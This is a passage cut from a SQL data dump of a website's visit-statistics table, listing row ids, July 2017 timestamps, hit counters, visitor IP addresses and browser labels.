,'chrome'),(132090,1499883498,1,1,0,0,'91.196.178.67','chrome'),(132091,1499883879,1,1,0,0,'95.108.213.34','other'),(132092,1499884436,1,1,0,0,'216.244.66.246','other'),(132093,1499884543,1,1,0,0,'207.46.13.71','other'),(132094,1499884852,1,1,0,0,'95.65.219.191','other'),(132095,1499884968,1,0,1,0,'68.180.230.48',''),(132096,1499885449,1,1,0,0,'217.69.133.203','other'),(132097,1499885706,1,1,0,0,'217.182.132.6','other'),(132098,1499885789,1,1,0,0,'217.182.132.171','other'),(132099,1499885965,1,1,0,0,'217.182.132.63','other'),(132100,1499886038,1,1,0,0,'5.228.20.199','chrome'),(132101,1499886810,1,1,0,0,'217.182.132.71','other'),(132102,1499887055,1,1,0,0,'51.255.65.59','other'),(132103,1499887372,1,1,0,0,'217.182.132.78','other'),(132104,1499887406,1,1,0,0,'51.255.71.119','other'),(132105,1499887857,1,1,0,0,'130.180.220.228','chrome'),(132106,1499888476,1,1,0,0,'51.255.65.57','other'),(132107,1499888822,1,1,0,0,'95.108.179.15','other'),(132108,1499888952,1,1,0,0,'8.29.198.26','other'),(132109,1499889102,1,1,0,0,'176.15.227.107','msie'),(132110,1499889185,2,2,0,0,'216.244.66.246','other'),(132111,1499890000,1,1,0,0,'51.255.65.3','other'),(132112,1499890910,1,1,0,0,'217.182.132.240','other'),(132113,1499891512,1,1,0,0,'217.182.132.90','other'),(132114,1499891769,2,2,0,0,'91.211.122.196','chrome'),(132115,1499891985,1,1,0,0,'217.182.132.67','other'),(132116,1499892020,1,1,0,0,'195.154.251.162','chrome'),(132117,1499892100,1,1,0,0,'217.182.132.179','other'),(132118,1499892398,1,1,0,0,'217.182.132.171','other'),(132119,1499892420,1,1,0,0,'141.8.142.154','other'),(132120,1499892443,1,1,0,0,'217.182.132.35','other'),(132121,1499892844,1,1,0,0,'217.182.132.177','other'),(132122,1499893283,1,1,0,0,'87.250.224.7','other'),(132123,1499893301,1,1,0,0,'216.244.66.246','other'),(132124,1499893412,2,2,0,0,'95.108.213.34','other'),(132125,1499893554,1,1,0,0,'91.196.178.166','chrome'),(132126,1499894858,1,1,0,0,'180.76.15.162','other'),(132127,1499895399,1,0,1,0,'66.249.76.109',''),(132128,1499895655,1,1,0,0,'51.255.71.111','other'),(132129,1499897046,1,1,0,0,'207.46.13.71','other'),(132130,1499897321,1,1,0,0,'216.244.66.237','other'),(132131,1499897545,1,1,0,0,'217.182.132.77','other'),(132132,1499898247,1,1,0,0,'87.250.224.7','other'),(132133,1499898387,1,1,0,0,'51.255.65.52','other'),(132134,1499898473,1,1,0,0,'216.244.66.194','other'),(132135,1499898579,1,1,0,0,'217.182.132.90','other'),(132136,1499899082,1,1,0,0,'95.108.213.34','other'),(132137,1499899294,1,1,0,0,'207.46.13.100','other'),(132138,1499899412,1,1,0,0,'217.182.132.4','other'),(132139,1499899557,1,1,0,0,'217.182.132.187','other'),(132140,1499899780,1,1,0,0,'8.29.198.26','other'),(132141,1499901477,1,0,1,0,'66.249.76.109',''),(132142,1499902774,1,1,0,0,'51.255.65.10','other'),(132143,1499903078,1,1,0,0,'217.182.132.178','other'),(132144,1499903289,1,1,0,0,'137.74.207.119','other'),(132145,1499903872,2,2,0,0,'91.209.11.236','other'),(132146,1499903874,1,1,0,0,'216.244.66.237','other'),(132147,1499904669,2,2,0,0,'216.244.66.246','other'),(132148,1499904847,1,1,0,0,'217.182.132.180','other'),(132149,1499905127,1,1,0,0,'207.46.13.74','other'),(132150,1499905265,1,1,0,0,'66.249.66.75','chrome'),(132151,1499905451,1,1,0,0,'217.182.132.151','other'),(132152,1499906392,2,2,0,0,'216.244.66.194','other'),(132153,1499906532,1,1,0,0,'217.182.132.147','other'),(132154,1499906631,1,1,0,0,'95.108.213.34','other'),(132155,1499906891,1,1,0,0,'51.255.65.90','other'),(132156,1499906984,1,1,0,0,'51.255.65.10','other'),(132157,1499907128,2,2,0,0,'141.8.142.164','other'),(132158,1499907416,1,1,0,0,'51.255.65.94','other'),(132159,1499907725,1,1,0,0,'66.249.76.108','chrome'),(132160,1499908473,64,64,0,0,'64.140.169.42','firefox'),(132161,1499908651,1,1,0,0,'51.255.71.131','other'),(132162,1499909233,1,1,0,0,'51.255.65.82','other'),(132163,1499909438,1,1,0,0,'51.255.65.27','other'),(132164,1499909866,1,0,1,0,'66.249.76.107',''),(132165,1499910308,1,1,0,0,'91.209.11.236','other'),(132166,1499910609,1,1,0,0,'8.29.198.26','other'),(132167,1499910727,2,2,0,0,'216.244.66.194','other'),(132168,1499910815,1,1,0,0,'164.132.164.180','other'),(132169,1499910896,1,1,0,0,'137.74.201.99','other'),(132170,1499911786,1,1,0,0,'51.255.65.94','other'),(132171,1499911818,1,1,0,0,'141.8.142.154','other'),(132172,1499911972,1,1,0,0,'141.8.142.164','other'),(132173,1499912111,1,1,0,0,'51.255.71.112','other'),(132174,1499912377,1,1,0,0,'95.108.179.15','other'),(132175,1499912389,1,1,0,0,'51.255.65.37','other'),(132176,1499912555,1,1,0,0,'51.255.65.75','other'),(132177,1499913402,1,1,0,0,'51.255.65.84','other'),(132178,1499913633,1,1,0,0,'217.182.132.97','other'),(132179,1499913694,1,1,0,0,'137.74.201.108','other'),(132180,1499913832,1,1,0,0,'216.244.66.246','other'),(132181,1499913969,1,1,0,0,'141.8.132.39','other'),(132182,1499914573,1,1,0,0,'95.108.213.34','other'),(132183,1499914988,1,1,0,0,'217.182.132.91','other'),(132184,1499915314,1,1,0,0,'87.250.224.18','other'),(132185,1499915420,1,0,1,0,'66.249.76.109',''),(132186,1499915589,6,6,0,0,'216.244.66.246','other'),(132187,1499916233,1,1,0,0,'164.132.162.154','other'),(132188,1499916844,1,1,0,0,'5.255.253.63','other'),(132189,1499917242,1,1,0,0,'51.255.65.95','other'),(132190,1499918001,2,2,0,0,'141.8.142.154','other'),(132191,1499918192,1,1,0,0,'66.249.76.107','chrome'),(132192,1499918680,1,1,0,0,'217.182.132.86','other'),(132193,1499918762,1,1,0,0,'217.182.132.180','other'),(132194,1499920062,1,1,0,0,'91.209.11.236','other'),(132195,1499920063,1,1,0,0,'207.46.13.71','other'),(132196,1499920430,1,1,0,0,'51.255.71.119','other'),(132197,1499920665,1,1,0,0,'95.108.179.15','other'),(132198,1499920704,1,1,0,0,'217.182.132.176','other'),(132199,1499920768,1,1,0,0,'87.250.224.7','other'),(132200,1499921182,1,1,0,0,'91.196.178.68','firefox'),(132201,1499921444,1,1,0,0,'8.29.198.25','other'),(132202,1499921630,1,1,0,0,'141.8.142.164','other'),(132203,1499921762,2,2,0,0,'91.209.11.236','other'),(132204,1499921864,2,2,0,0,'217.182.132.73','other'),(132205,1499922041,1,0,1,0,'68.180.230.48',''),(132206,1499922420,1,1,0,0,'95.108.213.7','other'),(132207,1499922566,2,2,0,0,'216.244.66.246','other'),(132208,1499922695,1,1,0,0,'91.196.178.72','firefox'),(132209,1499923114,1,1,0,0,'91.196.178.166','chrome'),(132210,1499923258,1,1,0,0,'95.108.213.34','other'),(132211,1499923661,1,1,0,0,'141.8.142.164','other'),(132212,1499924214,1,1,0,0,'66.249.76.108','chrome'),(132213,1499924265,1,1,0,0,'51.255.71.131','other'),(132214,1499925694,1,1,0,0,'173.234.159.250','other'),(132215,1499926037,1,1,0,0,'87.250.224.7','other'),(132216,1499926121,2,2,0,0,'134.249.182.50','firefox'),(132217,1499926475,1,1,0,0,'82.207.121.233','chrome'),(132218,1499927351,1,0,1,0,'66.249.66.155',''),(132219,1499927523,1,1,0,0,'51.255.71.128','other'),(132220,1499927971,1,1,0,0,'93.175.202.248','chrome'),(132221,1499928083,1,1,0,0,'78.111.189.88','chrome'),(132222,1499928090,1,1,0,0,'37.73.220.187','chrome'),(132223,1499928387,1,1,0,0,'188.166.87.191','firefox'),(132224,1499929651,1,1,0,0,'217.182.132.33','other'),(132225,1499929841,1,1,0,0,'178.251.108.137','chrome'),(132226,1499929906,1,1,0,0,'217.182.132.29','other'),(132227,1499930113,1,1,0,0,'66.249.76.108','chrome'),(132228,1499930295,1,1,0,0,'66.249.76.93','chrome'),(132229,1499930767,1,1,0,0,'217.69.133.3','other'),(132230,1499931153,1,1,0,0,'40.77.167.122','other'),(132231,1499931284,1,1,0,0,'95.108.213.34','other'),(132232,1499931288,1,0,1,0,'66.249.76.107',''),(132233,1499931714,1,1,0,0,'217.182.132.83','other'),(132234,1499932005,1,1,0,0,'95.108.179.15','other'),(132235,1499932009,1,1,0,0,'51.255.65.49','other'),(132236,1499932064,1,1,0,0,'5.255.253.63','other'),(132237,1499932279,1,1,0,0,'8.29.198.25','other'),(132238,1499932545,1,1,0,0,'87.250.224.18','other'),(132239,1499933226,3,3,0,0,'216.244.66.246','other'),(132240,1499933378,1,1,0,0,'51.255.65.53','other'),(132241,1499933538,1,1,0,0,'51.255.65.50','other'),(132242,1499933759,1,1,0,0,'217.182.132.83','other'),(132243,1499933780,1,1,0,0,'46.173.175.126','chrome'),(132244,1499933881,1,1,0,0,'66.249.76.109','chrome'),(132245,1499934226,1,1,0,0,'51.255.65.78','other'),(132246,1499934734,1,1,0,0,'217.182.132.14','other'),(132247,1499934840,1,1,0,0,'51.255.71.101','other'),(132248,1499934898,2,2,0,0,'216.244.66.194','other'),(132249,1499935051,1,1,0,0,'37.55.203.69','chrome'),(132250,1499935097,1,0,1,0,'66.249.76.91',''),(132251,1499935192,1,1,0,0,'137.74.207.114','other'),(132252,1499935339,1,0,1,0,'66.249.76.89',''),(132253,1499935341,1,1,0,0,'91.196.178.70','chrome'),(132254,1499935463,1,1,0,0,'66.249.66.76','chrome'),(132255,1499935465,1,1,0,0,'91.196.178.70','firefox'),(132256,1499935616,1,1,0,0,'87.250.224.7','other'),(132257,1499936057,1,1,0,0,'217.182.132.90','other'),(132258,1499936058,1,1,0,0,'217.182.132.71','other'),(132259,1499936508,1,1,0,0,'51.255.65.8','other'),(132260,1499936522,1,1,0,0,'217.69.133.2','other'),(132261,1499936595,1,1,0,0,'51.255.65.86','other'),(132262,1499937578,1,1,0,0,'91.196.178.70','chrome'),(132263,1499937973,1,1,0,0,'91.196.178.71','chrome'),(132264,1499938090,2,2,0,0,'216.244.66.246','other'),(132265,1499938130,1,0,1,0,'66.249.76.107',''),(132266,1499938780,1,1,0,0,'95.108.213.34','other'),(132267,1499939213,1,1,0,0,'217.69.133.5','other'),(132268,1499939562,3,3,0,0,'91.209.11.236','other'),(132269,1499940319,1,1,0,0,'95.158.2.92','firefox'),(132270,1499940375,1,1,0,0,'217.182.132.186','other'),(132271,1499940408,3,3,0,0,'216.244.66.246','other'),(132272,1499940462,1,1,0,0,'217.182.132.68','other'),(132273,1499940689,1,1,0,0,'217.182.132.32','other'),(132274,1499941247,1,1,0,0,'207.46.13.100','other'),(132275,1499941671,1,1,0,0,'91.196.178.68','firefox'),(132276,1499942310,1,1,0,0,'91.196.178.69','firefox'),(132277,1499942547,1,1,0,0,'217.182.132.149','other'),(132278,1499942876,1,1,0,0,'66.249.76.91','chrome'),(132279,1499943114,1,1,0,0,'8.29.198.26','other'),(132280,1499943587,1,1,0,0,'91.242.55.64','chrome'),(132281,1499944262,1,1,0,0,'91.196.178.70','firefox'),(132282,1499944277,1,1,0,0,'217.182.132.33','other'),(132283,1499944336,1,1,0,0,'217.182.132.190','other'),(132284,1499944449,1,1,0,0,'217.182.132.191','other'),(132285,1499944657,1,1,0,0,'91.209.11.236','other'),(132286,1499945409,1,1,0,0,'51.255.65.32','other'),(132287,1499945537,2,2,0,0,'216.244.66.246','other'),(132288,1499945624,1,1,0,0,'217.182.132.178','other'),(132289,1499945685,1,1,0,0,'66.249.76.93','chrome'),(132290,1499945786,1,1,0,0,'217.182.132.65','other'),(132291,1499945959,1,1,0,0,'217.182.132.57','other'),(132292,1499946624,1,1,0,0,'51.255.65.27','other'),(132293,1499947046,2,2,0,0,'88.198.19.164','other'),(132294,1499947383,1,1,0,0,'217.182.132.146','other'),(132295,1499947514,3,3,0,0,'216.244.66.246','other'),(132296,1499947546,1,1,0,0,'51.255.65.30','other'),(132297,1499947870,1,1,0,0,'51.255.65.85','other'),(132298,1499948035,1,1,0,0,'66.249.66.75','chrome'),(132299,1499948153,1,1,0,0,'51.255.65.4','other'),(132300,1499948775,1,1,0,0,'94.178.198.85','firefox'),(132301,1499948991,1,1,0,0,'95.29.96.5','msie'),(132302,1499948993,1,1,0,0,'95.220.10.1','msie'),(132303,1499949079,1,0,1,0,'66.249.66.75',''),(132304,1499949283,1,1,0,0,'51.255.65.72','other'),(132305,1499949925,1,1,0,0,'46.48.13.161','chrome'),(132306,1499950119,1,1,0,0,'216.244.66.194','other'),(132307,1499950304,1,1,0,0,'66.249.66.76','chrome'),(132308,1499951016,1,1,0,0,'66.249.76.89','chrome'),(132309,1499951193,1,1,0,0,'51.255.65.14','other'),(132310,1499951438,1,1,0,0,'164.132.162.160','other'),(132311,1499951914,1,1,0,0,'137.74.207.101','other'),(132312,1499951952,1,1,0,0,'51.255.65.76','other'),(132313,1499952156,1,1,0,0,'95.108.179.15','other'),(132314,1499952405,16,16,0,0,'149.255.36.186','other'),(132315,1499952948,2,2,0,0,'40.77.167.122','other'),(132316,1499953094,1,1,0,0,'51.255.65.36','other'),(132317,1499953349,1,1,0,0,'37.55.151.241','firefox'),(132318,1499953406,1,1,0,0,'51.255.65.29','other'),(132319,1499953796,1,1,0,0,'51.255.65.34','other'),(132320,1499953944,1,1,0,0,'8.29.198.27','other'),(132321,1499954187,1,1,0,0,'91.196.177.46','chrome'),(132322,1499954690,1,1,0,0,'217.182.132.73','other'),(132323,1499954855,1,1,0,0,'207.46.13.100','other'),(132324,1499955136,2,2,0,0,'216.244.66.246','other'),(132325,1499955139,1,1,0,0,'66.102.9.29','chrome'),(132326,1499955464,1,0,1,0,'66.249.76.108',''),(132327,1499955996,1,0,1,0,'66.249.76.89',''),(132328,1499956038,1,1,0,0,'51.255.65.48','other'),(132329,1499956185,1,1,0,0,'217.182.132.149','other'),(132330,1499956473,1,1,0,0,'217.182.132.81','other'),(132331,1499957344,1,0,1,0,'66.249.76.109',''),(132332,1499957367,1,1,0,0,'216.244.66.194','other'),(132333,1499957702,2,1,1,0,'66.249.76.108',''),(132334,1499957828,2,0,2,0,'66.249.66.76',''),(132335,1499958357,1,1,0,0,'217.182.132.151','other'),(132336,1499958410,1,1,0,0,'217.182.132.193','other'),(132337,1499958413,1,0,1,0,'66.249.76.107',''),(132338,1499958644,1,0,1,0,'66.249.76.109',''),(132339,1499959138,1,1,0,0,'51.255.65.16','other'),(132340,1499959152,1,0,1,0,'66.249.76.91',''),(132341,1499959524,1,1,0,0,'180.76.15.142','other'),(132342,1499959874,1,1,0,0,'91.209.11.236','other'),(132343,1499960354,1,1,0,0,'51.255.71.123','other'),(132344,1499960459,1,1,0,0,'66.249.76.89','chrome'),(132345,1499961316,1,1,0,0,'51.255.71.127','other'),(132346,1499961430,1,1,0,0,'217.182.132.21','other'),(132347,1499961689,1,1,0,0,'141.8.142.164','other'),(132348,1499961776,1,1,0,0,'91.209.11.236','other'),(132349,1499961883,1,1,0,0,'66.249.66.155','chrome'),(132350,1499962348,1,1,0,0,'217.182.132.95','other'),(132351,1499962820,1,0,1,0,'66.249.76.91',''),(132352,1499962959,2,2,0,0,'5.255.253.63','other'),(132353,1499963251,2,0,2,0,'68.180.230.48',''),(132354,1499964294,1,0,1,0,'66.249.66.155',''),(132355,1499964778,1,1,0,0,'8.29.198.27','other'),(132356,1499965167,1,0,1,0,'68.180.230.48',''),(132357,1499965432,1,1,0,0,'87.250.224.7','other'),(132358,1499965782,3,3,0,0,'216.244.66.246','other'),(132359,1499966199,1,0,1,0,'66.249.76.93',''),(132360,1499966225,1,1,0,0,'95.108.179.15','other'),(132361,1499966566,1,1,0,0,'51.255.65.52','other'),(132362,1499967258,2,2,0,0,'216.244.66.246','other'),(132363,1499967715,1,1,0,0,'87.250.224.7','other'),(132364,1499968068,1,1,0,0,'217.69.133.3','other'),(132365,1499968108,3,3,0,0,'95.65.219.191','other'),(132366,1499968192,1,0,1,0,'66.249.76.93',''),(132367,1499968735,1,1,0,0,'91.207.105.27','chrome'),(132368,1499968771,1,1,0,0,'51.255.65.95','other'),(132369,1499969053,1,1,0,0,'91.196.178.163','chrome'),(132370,1499969279,1,0,1,0,'66.249.66.74',''),(132371,1499970012,1,0,1,0,'66.249.76.108',''),(132372,1499970619,1,1,0,0,'91.209.11.236','other'),(132373,1499971099,1,0,1,0,'66.249.66.76',''),(132374,1499971102,1,1,0,0,'66.249.66.75','chrome'),(132375,1499971154,1,1,0,0,'5.255.253.63','other'),(132376,1499971265,1,1,0,0,'217.69.133.3','other'),(132377,1499971358,1,0,1,0,'66.249.76.107',''),(132378,1499971372,1,1,0,0,'164.132.162.156','other'),(132379,1499971420,1,1,0,0,'141.8.142.154','other'),(132380,1499971454,2,2,0,0,'216.244.66.194','other'),(132381,1499972139,1,1,0,0,'51.255.65.92','other'),(132382,1499972312,1,1,0,0,'87.250.224.7','other'),(132383,1499972579,1,1,0,0,'66.249.66.81','chrome'),(132384,1499973097,1,0,1,0,'66.249.76.109',''),(132385,1499973390,1,0,1,0,'66.249.76.108',''),(132386,1499973392,1,0,1,0,'66.249.66.155',''),(132387,1499973566,1,1,0,0,'95.108.179.15','other'),(132388,1499973631,1,1,0,0,'87.250.224.18','other'),(132389,1499973703,2,2,0,0,'91.196.178.40','chrome'),(132390,1499974102,1,0,1,0,'66.249.76.109',''),(132391,1499974141,1,0,1,0,'68.180.230.48',''),(132392,1499974294,1,1,0,0,'66.249.76.107','chrome'),(132393,1499975438,1,1,0,0,'91.209.11.236','other'),(132394,1499975618,1,1,0,0,'8.29.198.25','other'),(132395,1499975718,1,1,0,0,'217.182.132.83','other'),(132396,1499975851,3,3,0,0,'216.244.66.246','other'),(132397,1499975902,1,1,0,0,'66.249.66.74','chrome'),(132398,1499976505,1,1,0,0,'188.166.39.59','chrome'),(132399,1499976673,1,1,0,0,'66.249.76.109','chrome'),(132400,1499976727,1,1,0,0,'66.249.66.156','chrome'),(132401,1499976806,1,1,0,0,'217.182.132.193','other'),(132402,1499977425,1,1,0,0,'176.31.231.10','other'),(132403,1499977717,1,0,1,0,'66.249.76.109',''),(132404,1499978165,2,2,0,0,'95.108.213.34','other'),(132405,1499978258,1,0,1,0,'66.249.76.93',''),(132406,1499978337,1,1,0,0,'95.108.179.15','other'),(132407,1499978527,1,1,0,0,'51.255.71.101','other'),(132408,1499978658,2,2,0,0,'216.244.66.194','other'),(132409,1499978819,1,1,0,0,'66.249.76.91','chrome'),(132410,1499978914,2,2,0,0,'87.250.224.7','other'),(132411,1499978978,1,0,1,0,'66.249.66.155',''),(132412,1499979307,1,1,0,0,'217.69.133.9','other'),(132413,1499979420,1,1,0,0,'141.8.142.164','other'),(132414,1499979498,2,2,0,0,'216.244.66.246','other'),(132415,1499979742,1,1,0,0,'217.182.132.65','other'),(132416,1499979750,1,1,0,0,'217.182.132.151','other'),(132417,1499979882,1,1,0,0,'95.108.213.34','other'),(132418,1499979971,1,1,0,0,'66.249.66.156','chrome'),(132419,1499980004,1,1,0,0,'66.249.66.74','chrome'),(132420,1499980352,1,0,1,0,'68.180.230.48',''),(132421,1499980403,1,0,1,0,'66.249.76.109',''),(132422,1499981038,1,1,0,0,'91.209.11.236','other'),(132423,1499981279,1,1,0,0,'5.255.253.63','other'),(132424,1499981923,1,1,0,0,'141.8.142.154','other'),(132425,1499982321,1,1,0,0,'66.249.76.91','chrome'),(132426,1499982397,1,0,1,0,'66.249.66.156',''),(132427,1499982566,1,1,0,0,'217.69.133.5','other'),(132428,1499982569,1,1,0,0,'51.255.65.45','other'),(132429,1499982633,1,1,0,0,'51.255.65.30','other'),(132430,1499983046,1,1,0,0,'141.8.142.164','other'),(132431,1499983195,1,1,0,0,'5.255.253.63','other'),(132432,1499983376,1,1,0,0,'217.182.132.153','other'),(132433,1499983465,1,1,0,0,'216.244.66.246','other'),(132434,1499983725,1,1,0,0,'51.255.65.97','other'),(132435,1499983969,1,0,1,0,'66.249.76.91',''),(132436,1499984098,1,1,0,0,'51.255.65.48','other'),(132437,1499984328,1,1,0,0,'217.182.132.76','other'),(132438,1499984862,1,1,0,0,'137.74.207.102','other'),(132439,1499984919,1,1,0,0,'66.249.76.109','chrome'),(132440,1499985365,1,1,0,0,'137.74.207.119','other'),(132441,1499985396,1,0,1,0,'66.249.66.156',''),(132442,1499985562,1,1,0,0,'51.255.71.123','other'),(132443,1499985958,1,1,0,0,'217.182.132.61','other'),(132444,1499985995,1,1,0,0,'141.8.142.154','other'),(132445,1499986101,1,1,0,0,'5.255.253.63','other'),(132446,1499986454,1,1,0,0,'8.29.198.25','other'),(132447,1499987083,1,1,0,0,'51.255.65.16','other'),(132448,1499987809,1,1,0,0,'216.244.66.246','other'),(132449,1499987874,1,1,0,0,'217.182.132.147','other'),(132450,1499987905,1,1,0,0,'51.255.65.2','other'),(132451,1499988086,1,1,0,0,'66.249.76.109','chrome'),(132452,1499988110,1,1,0,0,'66.249.76.91','chrome'),(132453,1499988292,1,1,0,0,'141.8.142.154','other'),(132454,1499988785,1,1,0,0,'95.108.213.34','other'),(132455,1499989743,1,1,0,0,'141.8.142.154','other'),(132456,1499990187,1,1,0,0,'51.255.65.27','other'),(132457,1499990369,1,1,0,0,'137.74.201.108','other'),(132458,1499990384,1,1,0,0,'217.182.132.241','other'),(132459,1499990398,1,1,0,0,'213.111.124.133','chrome'),(132460,1499990649,1,1,0,0,'217.182.132.186','other'),(132461,1499991552,1,1,0,0,'51.255.65.65','other'),(132462,1499992497,1,1,0,0,'51.255.65.67','other'),(132463,1499992661,1,1,0,0,'217.182.132.148','other'),(132464,1499992850,1,1,0,0,'207.46.13.100','other'),(132465,1499992885,1,1,0,0,'95.108.213.34','other'),(132466,1499993159,1,1,0,0,'5.255.253.63','other'),(132467,1499993163,1,1,0,0,'141.8.142.164','other'),(132468,1499993432,1,1,0,0,'51.255.65.52','other'),(132469,1499993479,1,1,0,0,'51.255.71.117','other'),(132470,1499993680,1,1,0,0,'217.69.133.2','other'),(132471,1499993686,1,1,0,0,'217.69.133.3','other'),(132472,1499993811,1,1,0,0,'141.8.142.154','other'),(132473,1499993854,1,0,1,0,'66.249.66.75',''),(132474,1499994040,1,1,0,0,'207.46.13.100','other'),(132475,1499994086,1,1,0,0,'87.250.224.7','other'),(132476,1499994385,1,0,1,0,'66.249.76.108',''),(132477,1499994782,1,1,0,0,'164.132.162.188','other'),(132478,1499994851,1,1,0,0,'37.54.224.156','chrome'),(132479,1499994938,1,1,0,0,'217.182.132.174','other'),(132480,1499994966,1,1,0,0,'217.182.132.187','other'),(132481,1499995026,1,1,0,0,'137.74.207.170','other'),(132482,1499995708,1,1,0,0,'51.255.71.110','other'),(132483,1499996376,1,1,0,0,'51.255.71.130','other'),(132484,1499996524,1,0,1,0,'66.249.76.89',''),(132485,1499996651,1,1,0,0,'66.249.76.109','chrome'),(132486,1499996656,1,1,0,0,'66.249.76.93','chrome'),(132487,1499996872,1,1,0,0,'95.108.213.34','other'),(132488,1499996879,1,1,0,0,'40.77.167.122','other'),(132489,1499997167,1,1,0,0,'141.8.142.154','other'),(132490,1499997287,1,1,0,0,'8.29.198.25','other'),(132491,1499997408,1,1,0,0,'51.255.65.37','other'),(132492,1499998094,1,1,0,0,'51.255.65.86','other'),(132493,1499998270,1,1,0,0,'51.255.71.115','other'),(132494,1499998294,1,1,0,0,'216.244.66.237','other'),(132495,1499998341,1,1,0,0,'217.182.132.85','other'),(132496,1499998778,2,2,0,0,'216.244.66.246','other'),(132497,1499998918,1,1,0,0,'51.255.71.133','other'),(132498,1499998941,1,0,1,0,'68.180.230.48',''),(132499,1499999242,1,1,0,0,'217.69.133.9','other'),(132500,1499999761,1,0,1,0,'66.249.76.109',''),(132501,1499999815,1,1,0,0,'217.182.132.70','other'),(132502,1500000118,1,1,0,0,'51.255.65.76','other'),(132503,1500000604,2,2,0,0,'91.209.11.236','other'),(132504,1500001004,1,1,0,0,'87.250.224.18','other'),(132505,1500001247,1,1,0,0,'141.8.142.154','other'),(132506,1500001922,1,1,0,0,'51.255.65.20','other'),(132507,1500002157,1,1,0,0,'66.249.66.156','chrome'),(132508,1500002162,2,1,1,0,'66.249.76.89',''),(132509,1500002632,1,1,0,0,'66.249.76.91','chrome'),(132510,1500002839,1,1,0,0,'51.255.65.39','other'),(132511,1500003068,1,1,0,0,'137.74.207.101','other'),(132512,1500003114,1,1,0,0,'141.8.142.164','other'),(132513,1500003268,1,1,0,0,'207.46.13.71','other'),(132514,1500003976,1,1,0,0,'151.80.27.118','other'),(132515,1500004640,1,1,0,0,'95.108.213.34','other'),(132516,1500004791,1,1,0,0,'95.108.179.15','other'),(132517,1500005553,1,1,0,0,'217.182.132.187','other'),(132518,1500005717,4,4,0,0,'216.244.66.246','other'),(132519,1500005966,1,1,0,0,'217.182.132.72','other'),(132520,1500006023,1,1,0,0,'217.69.133.9','other'),(132521,1500006196,1,1,0,0,'91.209.11.236','other'),(132522,1500006539,1,1,0,0,'51.255.65.96','other'),(132523,1500006573,1,1,0,0,'87.250.224.7','other'),(132524,1500007478,1,1,0,0,'51.255.65.42','other'),(132525,1500007531,1,1,0,0,'5.255.253.63','other'),(132526,1500007553,1,0,1,0,'66.249.66.156',''),(132527,1500007626,1,1,0,0,'95.108.179.15','other'),(132528,1500007658,1,1,0,0,'87.250.224.7','other'),(132529,1500007812,1,1,0,0,'217.182.132.146','other'),(132530,1500008117,1,1,0,0,'8.29.198.27','other'),(132531,1500008332,1,1,0,0,'216.244.66.246','other'),(132532,1500008364,1,1,0,0,'51.255.71.122','other'),(132533,1500008559,1,1,0,0,'51.255.65.56','other'),(132534,1500008564,1,1,0,0,'180.76.15.26','other'),(132535,1500009535,1,1,0,0,'91.196.178.66','chrome'),(132536,1500009677,1,0,1,0,'66.249.66.155',''),(132537,1500009804,1,1,0,0,'66.249.66.76','chrome'),(132538,1500010207,1,1,0,0,'51.255.71.100','other'),(132539,1500010225,1,1,0,0,'51.255.65.29','other'),(132540,1500010329,1,1,0,0,'217.182.132.4','other'),(132541,1500010349,1,1,0,0,'217.69.133.4','other'),(132542,1500010446,1,1,0,0,'217.182.132.7','other'),(132543,1500011222,1,1,0,0,'217.182.132.51','other'),(132544,1500011354,1,1,0,0,'66.249.76.109','chrome'),(132545,1500011833,1,1,0,0,'91.196.178.167','chrome'),(132546,1500011890,2,2,0,0,'216.244.66.194','other'),(132547,1500011976,1,1,0,0,'51.255.65.63','other'),(132548,1500012644,1,1,0,0,'95.108.213.34','other'),(132549,1500012647,1,1,0,0,'178.154.149.3','other'),(132550,1500012749,1,1,0,0,'87.250.224.18','other'),(132551,1500013011,2,2,0,0,'192.166.219.136','other'),(132552,1500013089,1,1,0,0,'87.250.224.7','other'),(132553,1500013821,1,1,0,0,'217.182.132.62','other'),(132554,1500013891,1,1,0,0,'130.180.218.137','chrome'),(132555,1500014204,1,1,0,0,'217.182.132.148','other'),(132556,1500014305,1,1,0,0,'46.200.127.109','firefox'),(132557,1500014563,1,1,0,0,'217.182.132.171','other'),(132558,1500014627,1,1,0,0,'137.74.207.114','other'),(132559,1500015077,1,0,1,0,'68.180.230.48',''),(132560,1500015259,1,1,0,0,'217.182.132.90','other'),(132561,1500015261,1,1,0,0,'217.182.132.96','other'),(132562,1500015365,1,1,0,0,'141.8.183.1','other'),(132563,1500015502,4,4,0,0,'216.244.66.246','other'),(132564,1500015954,1,1,0,0,'51.255.65.59','other'),(132565,1500016785,2,2,0,0,'91.209.11.236','other'),(132566,1500017113,1,1,0,0,'66.249.66.155','chrome'),(132567,1500017121,1,1,0,0,'95.108.213.7','other'),(132568,1500017645,1,1,0,0,'5.255.253.28','other'),(132569,1500018537,1,1,0,0,'51.255.65.18','other'),(132570,1500018720,1,0,1,0,'66.249.76.107',''),(132571,1500018821,1,1,0,0,'51.255.65.42','other'),(132572,1500018921,1,1,0,0,'91.196.178.66','chrome'),(132573,1500018934,1,1,0,0,'217.182.132.31','other'),(132574,1500018947,1,1,0,0,'8.29.198.26','other'),(132575,1500019613,1,1,0,0,'217.182.132.29','other'),(132576,1500019841,1,1,0,0,'91.196.177.15','chrome'),(132577,1500020106,1,0,1,0,'66.249.76.108',''),(132578,1500020210,1,1,0,0,'109.206.55.32','chrome'),(132579,1500020304,1,1,0,0,'51.255.65.224','other'),(132580,1500020457,1,1,0,0,'217.182.132.96','other'),(132581,1500020618,1,1,0,0,'91.209.11.236','other'),(132582,1500020746,1,1,0,0,'95.108.213.7','other'),(132583,1500021705,1,1,0,0,'93.158.152.79','other'),(132584,1500021714,1,1,0,0,'5.255.253.58','other'),(132585,1500021859,1,1,0,0,'5.255.253.63','other'),(132586,1500022326,1,1,0,0,'95.108.179.15','other'),(132587,1500022342,1,1,0,0,'141.8.142.154','other'),(132588,1500022498,1,1,0,0,'217.182.132.23','other'),(132589,1500022826,1,1,0,0,'87.250.224.18','other'),(132590,1500023772,1,1,0,0,'137.74.207.159','other'),(132591,1500023922,1,1,0,0,'217.69.133.3','other'),(132592,1500024133,1,1,0,0,'51.255.65.87','other'),(132593,1500024195,1,1,0,0,'87.250.224.7','other'),(132594,1500024425,1,1,0,0,'51.255.65.51','other'),(132595,1500025043,1,1,0,0,'51.255.65.12','other'),(132596,1500025067,1,1,0,0,'137.74.207.119','other'),(132597,1500025611,1,1,0,0,'217.182.132.71','other'),(132598,1500025770,1,0,1,0,'68.180.231.23',''),(132599,1500025777,1,1,0,0,'217.182.132.53','other'),(132600,1500025897,1,1,0,0,'37.53.224.158','chrome'),(132601,1500026106,1,1,0,0,'217.182.132.60','other'),(132602,1500026621,1,1,0,0,'87.250.224.7','other'),(132603,